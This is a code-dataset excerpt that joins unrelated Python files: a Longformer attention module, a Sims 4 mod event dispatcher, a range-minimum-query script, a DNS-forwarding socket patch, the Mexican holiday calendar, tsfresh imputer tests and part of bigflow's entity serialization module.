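# True at columns i-1, i and i+1 (clipped at the sequence boundaries); marking a position as global
# additionally sets its entire row and column to True.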
def _get_attention_result(query,
key,
value,
dtype,
precision,
dropout_rng,
dropout_rate,
broadcast_dropout,
deterministic,
mask=None,
padding_mask=None,
key_padding_mask=None,
segmentation=None,
key_segmentation=None,
apply_causal_mask=False):
"""Helper function returning `[batch_size, seq_len, heads, features]` output."""
# assumes query/key/value has shape `[batch_size, seq_len, heads, features]`.
mask_components = [] if mask is None else [mask]
seq_len = query.shape[1]
if apply_causal_mask:
causal_mask = jnp.array(
np.reshape(np.tri(seq_len, k=0),
[1, 1, seq_len, seq_len])).astype(jnp.bool_)
mask_components.append(causal_mask)
if padding_mask is not None:
if key_padding_mask is None:
key_padding_mask = padding_mask
padding_mask = nn.attention.make_padding_mask(
padding_mask_query=padding_mask,
padding_mask_key=key_padding_mask,
query_shape=query.shape,
key_shape=key.shape,
attention_axis=(1,))
mask_components.append(padding_mask)
if segmentation is not None:
if key_segmentation is None:
key_segmentation = segmentation
segmentation_mask = nn.attention.make_padding_mask(
padding_mask_query=segmentation,
padding_mask_key=key_segmentation,
query_shape=query.shape,
key_shape=key.shape,
attention_axis=(1,),
segmentation_mask=True)
mask_components.append(segmentation_mask)
if mask_components:
attention_mask = mask_components[0]
for component in mask_components[1:]:
attention_mask = jnp.logical_and(attention_mask, component)
# attention mask in the form of attention bias
attention_bias = lax.select(
attention_mask > 0,
jnp.full(attention_mask.shape, 0.).astype(dtype),
jnp.full(attention_mask.shape, -1e10).astype(dtype))
else:
attention_bias = None
return nn.attention.dot_product_attention(
query,
key,
value,
dtype=dtype,
axis=1,
bias=attention_bias,
precision=precision,
dropout_rng=dropout_rng,
dropout_rate=dropout_rate,
broadcast_dropout=broadcast_dropout,
deterministic=deterministic)
class LongformerAttention(nn.Module):
"""Module implementing Longformer attention."""
def apply(self,
inputs_q,
inputs_kv,
num_heads,
sliding_window_size=512,
global_mask=None,
causal_mask=False,
dtype=jnp.float32,
qkv_features=None,
out_features=None,
padding_mask=None,
key_padding_mask=None,
segmentation=None,
key_segmentation=None,
broadcast_dropout=True,
dropout_rng=None,
dropout_rate=0.,
deterministic=False,
precision=None,
kernel_init=nn.linear.default_kernel_init,
bias_init=nn.initializers.zeros,
bias=True):
"""Applies longformer multi-head dot product attention on the input data.
Args:
inputs_q: input queries of shape `[bs, seq_len, features]`.
inputs_kv: key/values of shape `[bs, seq_len, features]` or `None` for
self-attention, in which case key/values will be derived from inputs_q.
num_heads: number of attention heads (should divide number of features).
sliding_window_size: size of sliding window attention to use.
global_mask: boolean matrix of shape `[bs, seq_len]`, where `True`
indicates that the position is globally attended. By default, no global
attention is used.
causal_mask: If true, apply causal attention masking.
dtype: the dtype of the computation (default: float32).
qkv_features: dimension of the key, query, and value.
out_features: dimension of the last projection.
padding_mask: boolean specifying query tokens that are pad token.
key_padding_mask: boolean specifying key-value tokens that are pad token.
segmentation: segment indices for packed inputs_q data.
key_segmentation: segment indices for packed inputs_kv data.
broadcast_dropout: use a broadcasted dropout along batch dims.
dropout_rng: JAX PRNGKey to be use for dropout.
dropout_rate: dropout rate.
      deterministic: if true, don't apply dropout (deterministic run); otherwise apply it.
precision: numerical precision of the computation.
kernel_init: initializer for the kernel of the Dense layers.
bias_init: initializer for the bias of the Dense layers.
      bias: whether pointwise QKVO dense transforms use bias.
Returns:
output of shape `[bs, seq_len, features]`.
"""
if inputs_kv is None:
inputs_kv = inputs_q
batch_size = inputs_q.shape[0]
features = out_features or inputs_q.shape[-1]
qkv_features = qkv_features or inputs_q.shape[-1]
seq_len = inputs_q.shape[1]
assert qkv_features % num_heads == 0, (
'Memory dimension must be divisible by number of heads.')
head_dim = qkv_features // num_heads
dense = nn.DenseGeneral.partial(
axis=-1,
features=(num_heads, head_dim),
kernel_init=kernel_init,
bias_init=bias_init,
bias=bias,
precision=precision)
query_sw = dense(inputs_q, dtype=dtype, name='query_sliding_window')
key_sw = dense(inputs_kv, dtype=dtype, name='key_sliding_window')
value_sw = dense(inputs_kv, dtype=dtype, name='value_sliding_window')
query_global = dense(inputs_q, dtype=dtype, name='query_global')
key_global = dense(inputs_kv, dtype=dtype, name='key_global')
value_global = dense(inputs_kv, dtype=dtype, name='value_global')
if global_mask is None:
global_mask = jnp.full((batch_size, seq_len), False)
full_global_mask = _build_global_mask(global_mask)
sliding_window_mask = _build_sliding_window_mask(
window_size=sliding_window_size, global_mask=global_mask)
x_sw = _get_attention_result(
query=query_sw,
key=key_sw,
value=value_sw,
dtype=dtype,
precision=precision,
dropout_rng=dropout_rng,
dropout_rate=dropout_rate,
broadcast_dropout=broadcast_dropout,
deterministic=deterministic,
mask=sliding_window_mask,
padding_mask=padding_mask,
key_padding_mask=key_padding_mask,
segmentation=segmentation,
key_segmentation=key_segmentation,
apply_causal_mask=causal_mask)
x_global = _get_attention_result(
query=query_global,
key=key_global,
value=value_global,
dtype=dtype,
precision=precision,
dropout_rng=dropout_rng,
dropout_rate=dropout_rate,
broadcast_dropout=broadcast_dropout,
deterministic=deterministic,
mask=full_global_mask,
padding_mask=padding_mask,
key_padding_mask=key_padding_mask,
segmentation=segmentation,
key_segmentation=key_segmentation,
apply_causal_mask=causal_mask)
x = jnp.where(global_mask[:, :, jnp.newaxis, jnp.newaxis], x_global, x_sw)
# back to the original inputs dimensions
out = nn.DenseGeneral(
x,
features=features,
axis=(-2, -1),
kernel_init=kernel_init,
bias_init=bias_init,
bias=bias,
dtype=dtype,
precision=precision,
name='out')
return out
LongformerSelfAttention = LongformerAttention.partial(inputs_kv=None)
|
src/sims4communitylib/events/build_buy/common_build_buy_event_dispatcher.py
|
velocist/TS4CheatsInfo
| 118 |
78796
|
"""
The Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).
https://creativecommons.org/licenses/by/4.0/
https://creativecommons.org/licenses/by/4.0/legalcode
Copyright (c) COLONOLNUTTY
"""
from typing import Any
from sims4communitylib.events.build_buy.events.build_buy_enter import S4CLBuildBuyEnterEvent
from sims4communitylib.events.build_buy.events.build_buy_exit import S4CLBuildBuyExitEvent
from sims4communitylib.events.event_handling.common_event_registry import CommonEventRegistry
from sims4communitylib.modinfo import ModInfo
from sims4communitylib.services.common_service import CommonService
from sims4communitylib.utils.common_injection_utils import CommonInjectionUtils
from zone import Zone
class CommonBuildBuyEventDispatcherService(CommonService):
"""A service that dispatches Build/Buy events.
.. warning:: Do not use this service directly to listen for events!\
Use the :class:`.CommonEventRegistry` to listen for dispatched events.
"""
def _on_build_buy_enter(self, zone: Zone, *_, **__):
return CommonEventRegistry.get().dispatch(S4CLBuildBuyEnterEvent(zone))
def _on_build_buy_exit(self, zone: Zone, *_, **__):
return CommonEventRegistry.get().dispatch(S4CLBuildBuyExitEvent(zone))
@CommonInjectionUtils.inject_safely_into(ModInfo.get_identity(), Zone, Zone.on_build_buy_enter.__name__)
def _common_build_buy_enter(original, self, *args, **kwargs) -> Any:
result = original(self, *args, **kwargs)
CommonBuildBuyEventDispatcherService.get()._on_build_buy_enter(self, *args, **kwargs)
return result
@CommonInjectionUtils.inject_safely_into(ModInfo.get_identity(), Zone, Zone.on_build_buy_exit.__name__)
def _common_build_buy_exit(original, self, *args, **kwargs) -> Any:
result = original(self, *args, **kwargs)
CommonBuildBuyEventDispatcherService.get()._on_build_buy_exit(self, *args, **kwargs)
return result
|
RMQ/rmq.py
|
saneravi/ML_Stuff
| 209 |
78843
|
#!/usr/bin/env python
"""Solve the range minimum query problem."""
def read_numbers(number_file, query_file):
"""
Parameters
----------
number_file : str
query_file : str
Returns
-------
tuple
(numbers, queries) - both are lists
"""
with open(number_file) as f:
numbers = list(map(int, f.read().split(" ")))
with open(query_file) as f:
queries = list(map(lambda s: list(map(int, s.split(":"))),
f.read().split("\n")))
return numbers, queries
def execute_queries(numbers, queries):
"""Find the minimum of numbers array for each query"""
for start, end in queries:
minimum = numbers[start]
for i in range(start, end+1):
if numbers[i] < minimum:
minimum = numbers[i]
print(minimum)
def execute_queries2(numbers, queries):
"""Find the minimum of numbers array for each query"""
for start, end in queries:
minimum = min(numbers[start:(end+1)])
print(minimum)
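# (added note) The precompute variant below builds an n x n table of range minima up front
# (O(n^2) time and memory), so every subsequent query is answered with a single O(1) lookup.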
def execute_queries_precompute(numbers, queries):
"""Find the minimum of numbers array for each query"""
n = len(numbers)
lookup_table = [[0 for j in range(n)] for i in range(n)]
for i in range(n):
minimum = numbers[i]
for j in range(i, n):
minimum = min(numbers[j], minimum)
lookup_table[i][j] = minimum
for start, end in queries:
print(lookup_table[start][end])
def get_parser():
"""Get a parser object."""
from argparse import ArgumentDefaultsHelpFormatter, ArgumentParser
parser = ArgumentParser(description=__doc__,
formatter_class=ArgumentDefaultsHelpFormatter)
parser.add_argument("-t", "--test",
dest="test", type=int,
default=0,
help="choose a testset ")
parser.add_argument("-a", "--algorithm",
dest="algorithm",
required=True,
choices=['precomputed_table',
'execute_queries',
'execute_queries2'],
help=("choose an algorithm"))
return parser
if __name__ == "__main__":
parser = get_parser()
args = parser.parse_args()
if args.algorithm == "precomputed_table":
algorithm = execute_queries_precompute
elif args.algorithm == "execute_queries":
algorithm = execute_queries
elif args.algorithm == "execute_queries2":
algorithm = execute_queries2
else:
print("Sorry, this algorithm is not known.")
import sys
sys.exit(0)
testsets = [("Testing/10.numbers.txt", "Testing/10.10.queries.txt"),
("Testing/1000.numbers.txt",
"Testing/1000.1000000.queries.txt"),
("Testing/1000.numbers.txt",
"Testing/1000.100000000.queries.txt")]
numbers, queries = read_numbers(testsets[args.test][0],
testsets[args.test][1])
algorithm(numbers, queries)
|
shadowsocks/dns_forward/socket.py
|
dogfight360/PySocket
| 121 |
78853
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2017 Falseen
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import, division, print_function, \
with_statement, nested_scopes
import sys
del sys.modules['socket']
import sys
import time
import logging
import types
import functools
path = sys.path[0]
sys.path.pop(0)
# import real socket
import socket
import struct
import binascii
sys.path.insert(0, path)
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# original (intercepted) address and port
orgin_addr = "172.16.58.3"
orgin_port = 53
# modified (new) destination address and port
new_dst_addr = "192.168.127.12"
new_dst_port = 53
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# dynamically patch a class method
def new_class_method(_class, method_name, new_method):
method = getattr(_class, method_name)
info = sys.version_info
if info[0] >= 3:
setattr(_class, method_name,
types.MethodType(lambda *args, **kwds: new_method(method, *args, **kwds), _class))
else:
setattr(_class, method_name,
types.MethodType(lambda *args, **kwds: new_method(method, *args, **kwds), None, _class))
# dynamically patch an instance method
def new_self_method(self, method_name, new_method):
method = getattr(self, method_name)
info = sys.version_info
if info[0] >= 3:
setattr(self, method_name, types.MethodType(lambda *args, **kwds: new_method(method, *args, **kwds), self))
else:
setattr(self, method_name, types.MethodType(lambda *args, **kwds: new_method(method, *args, **kwds), self, self))
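# (added note) new_sendto silently redirects packets addressed to the original DNS server to the
# new destination, and new_recvfrom rewrites the reply's source address back to the original one,
# so callers never notice the forwarding.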
def new_recvfrom(real_method, self, *args, **kwds):
data, src_addrs = real_method(*args, **kwds)
src_addr, src_port = src_addrs
if src_port == new_dst_port and src_addr == new_dst_addr:
# logging.info("fix %s:%d to %s:%d" % (src_addr, src_port, orgin_addr, orgin_port))
return data, (orgin_addr, orgin_port)
return data, src_addrs
def new_sendto(orgin_method ,self, *args, **kwds):
data, dst_addrs = args
dst_addr, dst_port = dst_addrs
if dst_port == orgin_port and dst_addr == orgin_addr :
# logging.info("forward %s:%d to %s:%d" % (dst_addr, dst_port, new_dst_addr, new_dst_port))
new_self_method(self, 'recvfrom', new_recvfrom)
args = (data, (new_dst_addr, new_dst_port))
return_value = orgin_method(*args, **kwds)
return return_value
# make a new socket class
class new_socket(socket.socket):
def __init__(self, *args, **kwds):
super(new_socket, self).__init__(*args, **kwds)
new_self_method(self, 'sendto', new_sendto)
# replace socket class to new_socket
socket.socket = new_socket
|
holidays/countries/mexico.py
|
m-ganko/python-holidays
| 654 |
78861
|
# -*- coding: utf-8 -*-
# python-holidays
# ---------------
# A fast, efficient Python library for generating country, province and state
# specific sets of holidays on the fly. It aims to make determining whether a
# specific date is a holiday as fast and flexible as possible.
#
# Author: ryanss <<EMAIL>> (c) 2014-2017
# dr-prodigy <<EMAIL>> (c) 2017-2021
# Website: https://github.com/dr-prodigy/python-holidays
# License: MIT (see LICENSE file)
from datetime import date
from dateutil.relativedelta import relativedelta as rd, MO
from holidays.constants import FRI, SAT, SUN
from holidays.constants import JAN, FEB, MAR, MAY, SEP, NOV, DEC
from holidays.holiday_base import HolidayBase
class Mexico(HolidayBase):
def __init__(self, **kwargs):
self.country = "MX"
HolidayBase.__init__(self, **kwargs)
def _populate(self, year):
# New Year's Day
name = "Año Nuevo [New Year's Day]"
self[date(year, JAN, 1)] = name
if self.observed and date(year, JAN, 1).weekday() == SUN:
self[date(year, JAN, 1) + rd(days=+1)] = name + " (Observed)"
# The next year's observed New Year's Day can be in this year
# when it falls on a Friday (Jan 1st is a Saturday)
if self.observed and date(year, DEC, 31).weekday() == FRI:
self[date(year, DEC, 31)] = name + " (Observed)"
# Constitution Day
name = "Día de la Constitución [Constitution Day]"
if self.observed and year >= 2007:
self[date(year, FEB, 1) + rd(weekday=MO(+1))] = (
name + " (Observed)"
)
if year >= 1917:
self[date(year, FEB, 5)] = name
# Benito Juárez's birthday
name = "<NAME> [Benito Juárez's birthday]"
if self.observed and year >= 2007:
self[date(year, MAR, 1) + rd(weekday=MO(+3))] = (
name + " (Observed)"
)
if year >= 1917:
self[date(year, MAR, 21)] = name
# Labor Day
if year >= 1923:
name = "Día del Trabajo [Labour Day]"
self[date(year, MAY, 1)] = name
if self.observed and date(year, MAY, 1).weekday() == SAT:
self[date(year, MAY, 1) + rd(days=-1)] = name + " (Observed)"
elif self.observed and date(year, MAY, 1).weekday() == SUN:
self[date(year, MAY, 1) + rd(days=+1)] = name + " (Observed)"
# Independence Day
name = "Día de la Independencia [Independence Day]"
self[date(year, SEP, 16)] = name
if self.observed and date(year, SEP, 16).weekday() == SAT:
self[date(year, SEP, 16) + rd(days=-1)] = name + " (Observed)"
elif self.observed and date(year, SEP, 16).weekday() == SUN:
self[date(year, SEP, 16) + rd(days=+1)] = name + " (Observed)"
# Revolution Day
name = "Día de la Revolución [Revolution Day]"
if self.observed and year >= 2007:
self[date(year, NOV, 1) + rd(weekday=MO(+3))] = (
name + " (Observed)"
)
if year >= 1917:
self[date(year, NOV, 20)] = name
# Change of Federal Government
# Every six years--next observance 2018
name = "Transmisión del Poder Ejecutivo Federal"
name += " [Change of Federal Government]"
if year >= 1970 and (2096 - year) % 6 == 0:
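            # (added note) (2096 - year) % 6 == 0 holds every six years (..., 2012, 2018, 2024, ...),
            # i.e. the years in which the federal government changes on December 1st.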
self[date(year, DEC, 1)] = name
if self.observed and date(year, DEC, 1).weekday() == SAT:
self[date(year, DEC, 1) + rd(days=-1)] = name + " (Observed)"
elif self.observed and date(year, DEC, 1).weekday() == SUN:
self[date(year, DEC, 1) + rd(days=+1)] = name + " (Observed)"
# Christmas
self[date(year, DEC, 25)] = "Navidad [Christmas]"
if self.observed and date(year, DEC, 25).weekday() == SAT:
self[date(year, DEC, 25) + rd(days=-1)] = name + " (Observed)"
elif self.observed and date(year, DEC, 25).weekday() == SUN:
self[date(year, DEC, 25) + rd(days=+1)] = name + " (Observed)"
class MX(Mexico):
pass
class MEX(Mexico):
pass
|
tests/units/transformers/test_per_column_imputer.py
|
shubhada-2019/tsfresh
| 6,596 |
78870
|
<reponame>shubhada-2019/tsfresh
# -*- coding: utf-8 -*-
# This file as well as the whole tsfresh package are licenced under the MIT licence (see the LICENCE.txt)
# <NAME> (<EMAIL>), Blue Yonder Gmbh, 2016
import warnings
from builtins import range
from unittest import TestCase
import numpy as np
import numpy.testing as npt
import pandas as pd
import pandas.testing as pdt
from sklearn.exceptions import NotFittedError
from tsfresh.transformers.per_column_imputer import PerColumnImputer
class PerColumnImputerTestCase(TestCase):
def setUp(self):
np.random.seed(0)
def test_not_fitted(self):
imputer = PerColumnImputer()
X = pd.DataFrame()
self.assertRaises(NotFittedError, imputer.transform, X)
def test_only_nans_and_infs(self):
imputer = PerColumnImputer()
X = pd.DataFrame(index=list(range(100)))
X["NaNs"] = np.nan * np.ones(100)
X["PINF"] = np.PINF * np.ones(100)
X["NINF"] = np.NINF * np.ones(100)
with warnings.catch_warnings(record=True) as w:
imputer.fit(X)
self.assertEqual(len(w), 1)
self.assertEqual(
"The columns ['NaNs' 'PINF' 'NINF'] did not have any finite values. Filling with zeros.",
str(w[0].message),
)
selected_X = imputer.transform(X)
self.assertTrue((selected_X.values == 0).all())
def test_with_numpy_array(self):
imputer = PerColumnImputer()
X = pd.DataFrame(index=list(range(100)))
X["NaNs"] = np.nan * np.ones(100)
X["PINF"] = np.PINF * np.ones(100)
X["NINF"] = np.NINF * np.ones(100)
X_numpy = X.values.copy()
with warnings.catch_warnings(record=True) as w:
imputer.fit(X)
self.assertEqual(len(w), 1)
self.assertEqual(
"The columns ['NaNs' 'PINF' 'NINF'] did not have any finite values. Filling with zeros.",
str(w[0].message),
)
selected_X = imputer.transform(X)
# re-initialize for new dicts
imputer = PerColumnImputer()
with warnings.catch_warnings(record=True) as w:
imputer.fit(X_numpy)
self.assertEqual(len(w), 1)
self.assertEqual(
"The columns [0 1 2] did not have any finite values. Filling with zeros.",
str(w[0].message),
)
selected_X_numpy = imputer.transform(X_numpy)
npt.assert_array_equal(selected_X.values, selected_X_numpy.values)
self.assertTrue(selected_X_numpy.shape, (1, 100))
def test_standard_replacement_behavior(self):
imputer = PerColumnImputer()
data = [np.NINF, np.PINF, np.nan, 100.0, -100.0, 1.0, 1.0]
truth = [-100.0, 100.0, 1.0, 100.0, -100.0, 1.0, 1.0]
X = pd.DataFrame({"a": data})
true_X = pd.DataFrame({"a": truth})
imputer.fit(X)
selected_X = imputer.transform(X)
pdt.assert_frame_equal(selected_X, true_X)
def test_partial_preset_col_to_NINF_given(self):
data = [np.NINF, np.PINF, np.nan, 100.0, -100.0, 1.0, 1.0]
truth = [-100.0, 100.0, 1.0, 100.0, -100.0, 1.0, 1.0]
X = pd.DataFrame({"a": data})
true_X = pd.DataFrame({"a": truth})
col_to_min = {"a": -100}
imputer = PerColumnImputer(col_to_NINF_repl_preset=col_to_min)
imputer.fit(X)
selected_X = imputer.transform(X)
pdt.assert_frame_equal(selected_X, true_X)
def test_partial_preset_col_to_PINF_given(self):
data = [np.NINF, np.PINF, np.nan, 100.0, -100.0, 1.0, 1.0]
truth = [-100.0, 100.0, 1.0, 100.0, -100.0, 1.0, 1.0]
X = pd.DataFrame({"a": data})
true_X = pd.DataFrame({"a": truth})
col_to_max = {"a": 100}
imputer = PerColumnImputer(col_to_PINF_repl_preset=col_to_max)
imputer.fit(X)
selected_X = imputer.transform(X)
pdt.assert_frame_equal(selected_X, true_X)
def test_partial_preset_col_to_NAN_given(self):
data = [np.NINF, np.PINF, np.nan, 100.0, -100.0, 1.0, 1.0]
truth = [-100.0, 100.0, 1.0, 100.0, -100.0, 1.0, 1.0]
X = pd.DataFrame({"a": data})
true_X = pd.DataFrame({"a": truth})
col_to_median = {"a": 1}
imputer = PerColumnImputer(col_to_NAN_repl_preset=col_to_median)
imputer.fit(X)
selected_X = imputer.transform(X)
pdt.assert_frame_equal(selected_X, true_X)
def test_different_shapes_fitted_and_transformed(self):
imputer = PerColumnImputer()
X = pd.DataFrame(index=list(range(10)))
X["a"] = np.ones(10)
imputer.fit(X)
X["b"] = np.ones(10)
self.assertRaises(ValueError, imputer.transform, X)
def test_preset_has_higher_priority_than_fit(self):
data = [np.NINF, np.PINF, np.nan, 100.0, -100.0, 1.0, 1.0]
truth = [-100.0, 100.0, 0.0, 100.0, -100.0, 1.0, 1.0]
X = pd.DataFrame({"a": data})
true_X = pd.DataFrame({"a": truth})
col_to_median = {"a": 0}
imputer = PerColumnImputer(col_to_NAN_repl_preset=col_to_median)
imputer.fit(X)
selected_X = imputer.transform(X)
pdt.assert_frame_equal(selected_X, true_X)
def test_only_parameters_of_last_fit_count(self):
data = [np.NINF, np.PINF, np.nan, 100.0, -100.0, 1.0, 1.0]
data_2 = [np.NINF, np.PINF, np.nan, 10.0, -10.0, 3.0, 3.0]
truth_a = [-10.0, 10.0, 3.0, 10.0, -10.0, 3.0, 3.0]
truth_b = [-10.0, 10.0, 3.0, 10.0, -10.0, 3.0, 3.0]
X = pd.DataFrame({"a": data, "b": data})
X_2 = pd.DataFrame({"a": data_2, "b": data_2})
true_X = pd.DataFrame({"a": truth_a, "b": truth_b})
imputer = PerColumnImputer()
imputer.fit(X)
imputer.fit(X_2)
selected_X = imputer.transform(X_2)
pdt.assert_frame_equal(selected_X, true_X)
def test_only_subset_of_columns_given(self):
data = [np.NINF, np.PINF, np.nan, 100.0, -100.0, 1.0, 1.0]
truth_a = [-100.0, 100.0, 0.0, 100.0, -100.0, 1.0, 1.0]
truth_b = [-100.0, 100.0, 1.0, 100.0, -100.0, 1.0, 1.0]
X = pd.DataFrame({"a": data, "b": data})
true_X = pd.DataFrame({"a": truth_a, "b": truth_b})
col_to_median = {"a": 0}
imputer = PerColumnImputer(col_to_NAN_repl_preset=col_to_median)
imputer.fit(X)
selected_X = imputer.transform(X)
pdt.assert_frame_equal(selected_X, true_X)
def test_NINF_preset_contains_more_columns_than_dataframe_to_fit(self):
X = pd.DataFrame(index=list(range(10)))
X["a"] = np.ones(10)
col_to_min = {"a": 0, "b": 0}
imputer = PerColumnImputer(col_to_NINF_repl_preset=col_to_min)
self.assertRaises(ValueError, imputer.fit, X)
def test_PINF_preset_contains_more_columns_than_dataframe_to_fit(self):
X = pd.DataFrame(index=list(range(10)))
X["a"] = np.ones(10)
col_to_max = {"a": 0, "b": 0}
imputer = PerColumnImputer(col_to_PINF_repl_preset=col_to_max)
self.assertRaises(ValueError, imputer.fit, X)
def test_NAN_preset_contains_more_columns_than_dataframe_to_fit(self):
X = pd.DataFrame(index=list(range(10)))
X["a"] = np.ones(10)
col_to_median = {"a": 0, "b": 0}
imputer = PerColumnImputer(col_to_NAN_repl_preset=col_to_median)
self.assertRaises(ValueError, imputer.fit, X)
|
bigflow_python/python/bigflow/core/entity.py
|
advancedxy/bigflow_python
| 1,236 |
78877
|
<gh_stars>1000+
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015 Baidu, Inc. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Python implementation of the Flume Entity. An Entity is a serializable wrapper around a Flume operator.
"""
import copy
import pickle
import threading
import os
import uuid
import atexit
import subprocess
from bigflow import error
from bigflow import pcollection, ptable, pobject
from bigflow.core.serde import cloudpickle
from bigflow.util.log import logger
_mutex = threading.Lock()
_entity_id = 0
ENTITY_FOLDER_BASE= "entity-" + str(uuid.uuid1())
ENTITY_FOLDER = os.path.normpath(os.path.join(os.getcwd(), ENTITY_FOLDER_BASE))
FLUME_WORKER_ENTITY_FOLDER = ENTITY_FOLDER_BASE
ONE_MEGA_BYTES = 1024 * 1024
ENTITY_PROTO_SIZE_LIMIT = ONE_MEGA_BYTES
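# (added note) Proto messages larger than ENTITY_PROTO_SIZE_LIMIT (1 MB) have their config written to
# a file under ENTITY_FOLDER by _to_proto_message_wrapper and are referenced via the config_file field
# instead of carrying the config inline.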
def _to_proto_message_wrapper(func):
"""wraps to_proto_message funcs
1. increase global counter
2. size > 1M, output config to a file
"""
def _wrapper(self, *args, **kwargs):
"""inner wrapper"""
import sys
import os
proto = func(self, *args, **kwargs)
with _mutex:
proto.id = sys.modules[__name__]._entity_id
sys.modules[__name__]._entity_id += 1
if (proto.ByteSize() > ENTITY_PROTO_SIZE_LIMIT):
# output to a file
if hasattr(self, "get_entity_name"):
name = self.get_entity_name()
else:
name = self.__class__.__name__
folder = sys.modules[__name__].ENTITY_FOLDER
file = os.path.join(folder, "_".join([name, str(uuid.uuid1())]))
with open(file, 'wb') as fd:
fd.write(proto.config)
# clear config filed
proto.ClearField('config')
proto.config_file = (
os.path.join(FLUME_WORKER_ENTITY_FOLDER, os.path.basename(file)))
return proto
return _wrapper
class EntitiedBySelf(object):
"""
An entity that returns given entity_name and entity_config
"""
def __init__(self):
pass
def get_entity_name(self):
"""
Get entity_name of this entity
Raises:
NotImplementedError: if not implemented
"""
raise NotImplementedError
def get_entity_config(self):
"""
Get entity_config of this entity
Raises:
NotImplementedError: if not implemented
"""
raise NotImplementedError
class Entity(object):
"""
A wrapper of serializable operators of Flume.
"""
loader = "PythonLoaderDelegator"
processor = "PythonProcessorDelegator"
objector = "PythonObjectorDelegator"
sinker = "PythonSinkerDelegator"
key_reader = "PythonKeyReaderDelegator"
partitioner = "PythonPartitionerDelegator"
sort_key_reader = "StrKeyReaderDelegator"
window = "PythonWindowFnDelegator"
trigger = "PythonTriggerDelegator"
time_reader = "PythonTimeReaderDelegator"
def __init__(self, name="", operator=None, message=None):
if message is None:
if len(name) == 0:
raise error.InvalidLogicalPlanException("Invalid name for entity.")
if operator is None:
raise error.InvalidLogicalPlanException("Invalid operator(None) for entity.")
if isinstance(operator, EntitiedBySelf):
self.__name = operator.get_entity_name()
self.__config = operator.get_entity_config()
elif isinstance(operator, str):
self.__name = name
self.__config = operator
else:
self.__name = name
self.__config = cloudpickle.dumps(operator)
else:
self.from_proto_message(message)
def is_empty(self):
return not self.__name or len(self.__name) == 0
@property
def config(self):
""" return config """
return self.__config
@property
def name(self):
""" return name """
return self.__name
def from_proto_message(self, message):
from bigflow.core import entity_names
for key, value in entity_names.__dict__.items():
if isinstance(key, str) and isinstance(value, str) and value == message.name:
self.__name = key
if self.__name is None:
raise error.InvalidLogicalPlanException("Invalid name/type for entity.")
self.__config = message.config
@_to_proto_message_wrapper
def to_proto_message(self):
from flume.proto import entity_pb2
from bigflow.core import entity_names
message = entity_pb2.PbEntity()
message.name = entity_names.__dict__[self.__name]
message.config = self.__config
return message
@staticmethod
def of(name, operator):
if isinstance(operator, Entity):
return operator
return Entity(name, operator)
@staticmethod
def from_message(pb_message):
return Entity(message=pb_message)
def create_and_setup(self):
if self.is_empty():
raise error.InvalidLogicalPlanException("Empty entity")
instance = pickle.loads(self.__config)
return instance
def __eq__(self, other):
if isinstance(other, Entity):
return self.__name == other.__name and self.config == other.__config
return False
def __ne__(self, other):
return not self == other
def __hash__(self):
return hash(self.__name) ^ hash(self.__config) ^ hash((self.__name, self.__config))
class PythonTimeReaderDelegator(EntitiedBySelf):
""" PythonTimeReaderDelegator """
def __init__(self, functor):
self._fn = Functor.of(functor)
def get_entity_name(self):
return "PythonTimeReaderDelegator"
def get_entity_config(self):
return self._fn.to_proto_message().SerializeToString()
class Functor(object):
def to_proto_message(self):
raise NotImplementedError()
def expect_iterable(self):
pass
@staticmethod
def of(fn):
"""
        If fn is a Functor, return it as-is;
        if fn is callable, wrap it as a PyFn;
        otherwise, create a fn that returns a deepcopy of the param.
NOTE: !!!!copy.deepcopy CANNOT be changed!!!
"""
if isinstance(fn, Functor):
return fn
elif callable(fn):
return PyFn(fn)
else:
return PyFn(lambda *p: copy.deepcopy(fn))
class PyFn(Functor):
def __init__(self, fn):
self.__fn = fn
self.__expect_iterable = False
def expect_iterable(self):
self.__expect_iterable = True
@_to_proto_message_wrapper
def to_proto_message(self):
from flume.proto import entity_pb2
from bigflow.core import entity_names
pb_entity = entity_pb2.PbEntity()
pb_entity.name = entity_names.__dict__['PythonImplFunctor']
config = {}
config['fn'] = self.__fn
config['expect_iterable'] = self.__expect_iterable
pb_entity.config = cloudpickle.dumps(config)
return pb_entity
class CppFunctor(Functor):
def name(self):
return type(self).__name__
def config(self):
"""config"""
return ""
@_to_proto_message_wrapper
def to_proto_message(self):
from flume.proto import entity_pb2
from bigflow.core import entity_names
pb_entity = entity_pb2.PbEntity()
pb_entity.name = entity_names.__dict__[self.name()]
pb_entity.config = self.config()
return pb_entity
class CartesianFn(CppFunctor):
pass
class FullJoinInitializeFn(CppFunctor):
pass
class FullJoinTransformFn(CppFunctor):
pass
class FullJoinFinalizeFn(CppFunctor):
pass
class OneSideJoinFn(CppFunctor):
pass
class ExtractValueFn(CppFunctor):
pass
class Partitioner(EntitiedBySelf):
def __init__(self, partition_fn):
self.partition = partition_fn
def get_entity_config(self):
return cloudpickle.dumps(self)
def get_entity_name(self):
return "PythonPartitionerDelegator"
class BucketPartitioner(EntitiedBySelf):
""" BucketPartitioner Entity Delegator """
def __init__(self, bucket_size=1000):
self.bucket_size = bucket_size
def get_entity_config(self):
""" inner functor """
from bigflow_python.proto import entity_config_pb2
pb = entity_config_pb2.PbBucketPartitionerConfig()
pb.bucket_size = self.bucket_size
return pb.SerializeToString()
def get_entity_name(self):
""" inner functor """
return "BucketPartitioner"
class SelfNamedEntityBase(EntitiedBySelf):
def get_entity_name(self):
